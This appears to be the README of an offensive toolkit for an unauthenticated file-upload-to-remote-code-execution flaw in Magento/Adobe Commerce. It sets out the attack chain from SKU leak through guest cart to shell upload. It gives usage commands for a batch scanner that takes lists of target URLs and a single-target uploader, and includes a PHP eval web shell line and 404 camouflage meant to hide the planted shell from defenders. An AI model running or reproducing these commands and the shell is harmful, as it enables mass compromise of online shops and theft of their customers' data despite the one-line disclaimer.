
Magento APSB25-94 Unauthenticated File Upload to RCE (CVE-2026-XXXX) - Eval Shell + Probe Scanner
Exploits unauthenticated file upload in Magento / Adobe Commerce via REST API guest cart custom_options file upload.
1. GraphQL → leak product SKU
2. REST API → create guest cart
3. REST API → upload PNG polyshell via custom_options file_info
4. HTTP GET → access .php at predictable path
5. PHP exec → RCE
magento_godzilla.py — Batch ScannerTwo-phase upload: probe file (WAF-safe) + eval shell (404 camouflage).
pip install requests
python magento_godzilla.py -f urls.txt -t 20 -o results.txt
Output: RCE_CONFIRMED, SHELL_KILLED, PROBE_ONLY
magento_upload.py — Single Target Uploadpython magento_upload.py -u https://target.com -f godzilla.php
python magento_upload.py -u https://target.com -c '<?php eval($_POST[1]);?>'
python magento_upload.py -u https://target.com -f shell.php --raw
/pub/media/custom_options/quote/{c1}/{c2}/{filename}
/media/custom_options/quote/{c1}/{c2}/{filename}
GET returns fake 404 (HTTP 200 + "Not Found" body). POST with password param executes code.
For authorized security testing only.